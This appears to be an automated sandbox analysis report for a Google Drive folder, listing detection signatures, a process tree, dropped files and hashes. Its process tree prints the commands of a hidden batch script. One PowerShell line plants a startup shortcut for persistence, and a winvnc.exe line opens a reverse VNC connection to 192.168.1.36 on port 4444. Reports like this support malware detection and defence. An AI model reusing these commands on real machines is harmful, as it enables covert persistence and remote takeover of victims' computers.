Overview

overview

7

Static

static

1

URLScan

urlscan

1

https://drive.google...

windows10-2004-x64

7

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-08-2024 20:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://drive.google.com/drive/folders/1NVzGGH4q1Le3efqdY71-pMTbQQc_hcn2?usp=sharing

Score
7/10
discovery

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 62 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1NVzGGH4q1Le3efqdY71-pMTbQQc_hcn2?usp=sharing
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8cd7946f8,0x7ff8cd794708,0x7ff8cd794718
      2⤵
        PID:2972
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
        2⤵
          PID:4032
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1240
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
          2⤵
            PID:1296
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
            2⤵
              PID:1188
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
              2⤵
                PID:3716
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
                2⤵
                  PID:4696
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2872
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
                  2⤵
                    PID:860
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                    2⤵
                      PID:2116
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
                      2⤵
                        PID:3296
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                        2⤵
                          PID:2820
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
                          2⤵
                            PID:4188
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5824 /prefetch:8
                            2⤵
                              PID:4896
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
                              2⤵
                                PID:4644
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4852
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6473114359910634160,15340579606235199181,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5356 /prefetch:2
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2752
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:992
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:3152
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:2512
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T200600Z-001\client\main.bat" "
                                    1⤵
                                      PID:2588
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T200600Z-001\client\main.bat';$s.Save()"
                                        2⤵
                                        • Drops startup file
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3448
                                      • C:\Users\Admin\Downloads\client-20240808T200600Z-001\client\winvnc.exe
                                        winvnc.exe -run
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:4704
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 1
                                        2⤵
                                        • Delays execution with timeout.exe
                                        PID:3580
                                      • C:\Users\Admin\Downloads\client-20240808T200600Z-001\client\winvnc.exe
                                        winvnc.exe -connect 192.168.1.36::4444
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4496
                                    • C:\Windows\system32\taskmgr.exe
                                      "C:\Windows\system32\taskmgr.exe" /7
                                      1⤵
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:5464

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      eeaa8087eba2f63f31e599f6a7b46ef4

                                      SHA1

                                      f639519deee0766a39cfe258d2ac48e3a9d5ac03

                                      SHA256

                                      50fe80c9435f601c30517d10f6a8a0ca6ff8ca2add7584df377371b5a5dbe2d9

                                      SHA512

                                      eaabfad92c84f422267615c55a863af12823c5e791bdcb30cabe17f72025e07df7383cf6cf0f08e28aa18a31c2aac5985cf5281a403e22fbcc1fb5e61c49fc3c

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      b9569e123772ae290f9bac07e0d31748

                                      SHA1

                                      5806ed9b301d4178a959b26d7b7ccf2c0abc6741

                                      SHA256

                                      20ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b

                                      SHA512

                                      cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                      Filesize

                                      1KB

                                      MD5

                                      63177fdebc976444768c7aa349ff42b9

                                      SHA1

                                      ae966c62986c280ec413edf4a4c31a79819f9432

                                      SHA256

                                      bda77be9cc5052879c1d8ac180c07262ffcafe84aea8c3e8c0bbbfa5dd575899

                                      SHA512

                                      6c315a77cd3bf2d9a1b8e330f9d3cd40117bece22eac9cf40d41e72c5fd16ce55370b0b13539ccf5d3f059b3038c43d72cfa32997660b7024c80f2f1a5211fc0

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                      Filesize

                                      1KB

                                      MD5

                                      d614cfd21f1f789d9dff706cac22a93d

                                      SHA1

                                      c05dfa9d174d50c12bab7545b576f43345e99ce4

                                      SHA256

                                      9c3984cbe92c9249b45083e11cca78605d9e4aaafcd07774401bb0cd2f9b2dfe

                                      SHA512

                                      4b8ed45065ed3c72f4b29b976a3f2cc93068b50a6ca9a0741db3202a2d5f9c131d3a79406590d817b05eb3fe9eaf363290646a0625af96edef31b738e994afd8

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                      Filesize

                                      3KB

                                      MD5

                                      96725f8eccbda44715b67f21cea37cac

                                      SHA1

                                      0ec9dc2e3a99b626156d08b9566820750ab96e2d

                                      SHA256

                                      5f967575b1aad4d947898e249b9ab8961dbebcae8db813b14277989d97c1ee72

                                      SHA512

                                      dd6292bf03a25dcbc49517c61397050082c71575d1614f8c14c004e4b59d07b341ca97999607d5cfd8f0d482aaf02899163390bccae0ec2347bf29e42fe89aa1

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      4b7a265c1f95740b3c98cd9179dd4434

                                      SHA1

                                      fd19b9d323e1dbbe8d61307a1be91be058da19bb

                                      SHA256

                                      b4b15eea9adf9e77a2252b97790368b5f3f5478ae6f657ff9876243b0addfb44

                                      SHA512

                                      2d582ef61331bd3a3570886ae7f006bbd5e02a9adddc3f0b95543b41c6cfa84c5197476c4cf84333013a2c5a0aad202126f21a1839754bfa029a8f45cc6b6beb

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      176c76d15be4b9452e5f7172710b67a3

                                      SHA1

                                      52ce00af3597efca33b99f93623fedc3dfb77620

                                      SHA256

                                      39b17580362d87f9c5d4361f2efbad831be5c4df1bc17dde9f0b0166d1d3a878

                                      SHA512

                                      a7b501a2ba1cd31374758ba366ed8f9cfb913194545f6e6a8fb508f7c5a15cf118c0349a4cdd1eca56a0643674f702e46b101cdb738fe2d111171b73b7b5fe73

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      50f9470041c644d1a98fa5a6ef7d39a2

                                      SHA1

                                      e9ea922e2252c47fee206b9e0aa2af9d459a1493

                                      SHA256

                                      bb95cd27f0d697da5d76d4432a795023807da20fab145290189b9412312eed2e

                                      SHA512

                                      f41ae0aa18ed3d68af0efb4634b546845ea3735c6805d80ff6c54c7f289266b4c28402ea778f392d30062a72d6bc744f9a659e2a436821f23cd21aef6718eb90

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                      Filesize

                                      1KB

                                      MD5

                                      ddf426f102b1c0fc70996283e0314b39

                                      SHA1

                                      ac0b56a3adccbf2690b7295d9877188459d28449

                                      SHA256

                                      b898679bf498b6e03f090373dbf143384a102f70d0b290f8a0b98685cf74fbe3

                                      SHA512

                                      92a4d7f23e21c46faccf3d2ec532e1ec5593be273c154d9af07a8bad75a49261f38b1a562c040d786ee66ed3a551d55f76bb5ed0714f4e73e4895849c28d89a5

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                      Filesize

                                      1KB

                                      MD5

                                      7a6a5f36b656dd1d79e714dc28d05b39

                                      SHA1

                                      d2ffc16bcabb875f71c319ed50c87efe6bd6288c

                                      SHA256

                                      f6e6fc9bb38d7b7aa23ca38d4c39ec66db5ea981d0545358ff1c3e73c76981db

                                      SHA512

                                      cc3d722141b72c860d4667eab5ae03fbdded3d16cc22bfdd666e04e4fb42c20bce2f3a7bcab18010cc831d772875178c93ae0b3744cd2d2fce995b20ea092916

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57d002.TMP
                                      Filesize

                                      1KB

                                      MD5

                                      d965d8e4b3710bba6c3779ad9c1b6efd

                                      SHA1

                                      07f11acd920aaa4ef69c3d24109a610154a68488

                                      SHA256

                                      d7d80e493eea2e5c89edc4315d21a40b99dad17ba99ff750d7c2c140faca888e

                                      SHA512

                                      7518df4c5afcce31c45e824726c65438e9c1dfce80ff731c6d346c7db86827dad8d6050cf6596851517a14f8fd297216d5fa78282a943ce1b2b5762b6f4b6cfd

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                      Filesize

                                      16B

                                      MD5

                                      6752a1d65b201c13b62ea44016eb221f

                                      SHA1

                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                      SHA256

                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                      SHA512

                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      11KB

                                      MD5

                                      52f645318e66be1082f26ed3b836a525

                                      SHA1

                                      b48c1325d335f65a7b8038d219c92157f09ba30a

                                      SHA256

                                      d635f42a55c6ef4734e5be97a9490ca13a59cbf8183baf0718732b203d3a87a0

                                      SHA512

                                      128fd0ade5a8fc9cf3ed6b3a5622befc3a03d017b6b44889161e4487780527c81d024a9529d064bb30a59855198b6fec83bb485e4f80600135432eb39cef3dd0

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      11KB

                                      MD5

                                      5726be06898bde06c71c9e1c5ad5fa79

                                      SHA1

                                      244e4a6414c14ac33f43625eff3d2b920414bc02

                                      SHA256

                                      d70b591b7f6901c0e7e190fc1c8907299c3417c899ffb60931f6aeb3736f6934

                                      SHA512

                                      2744d3bfd91c1ab78efa17ddc30eadadeafd97056f57482fff5418cca22666fbc060431a3d6002592bda95a2276dff26b95daa631dfbae4649fe6b3295c1891b

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_avrvyzy0.h1l.ps1
                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      Download Submit

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk
                                      Filesize

                                      901B

                                      MD5

                                      6b91a26cf5e5c62643cec1db59c65955

                                      SHA1

                                      ac3f0b506deb515bd3b297da92977ea8516c756d

                                      SHA256

                                      d2675336d8e9e63d0a3ef9f7b085b69856ac24216ba2447231e7875e5fa47584

                                      SHA512

                                      0c136e03d255ce860b25dff1c6b349aaecd4f6e77d3d12804001344eecfb451503178fe0689ef0cde2d310c6f3b1c7a91fa23111e9f964d353db019e91f47cf3

                                      Download Submit

                                    • C:\Users\Admin\Downloads\client-20240808T200600Z-001.zip
                                      Filesize

                                      1.0MB

                                      MD5

                                      250cd854754e5111c8c4f993dc00cb3f

                                      SHA1

                                      e27c193d3f0eb5d1d2fa7d33ce64d1cdf324093b

                                      SHA256

                                      ee7227fe1e2adb4e78bf0d6b0c3cd888cdc0322bd21db9ff82c6e87b9826217d

                                      SHA512

                                      d179a00cd6fcd8b8fb2043b6fce127951dcd7287313fe91d5a8bea1789fa2e9c8c92f86839a550ef76e1ca81ad56a5763d7be6b4d84a0c1450e7d9d748716468

                                      Download Submit

                                    • memory/3448-189-0x000002A26EAF0000-0x000002A26EB12000-memory.dmp

                                      Filesize

                                      136KB

                                      Download

                                    • memory/5464-211-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-220-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-219-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-218-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-217-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-221-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-222-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-223-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-213-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5464-212-0x0000024B07F30000-0x0000024B07F31000-memory.dmp

                                      Filesize

                                      4KB

                                      Download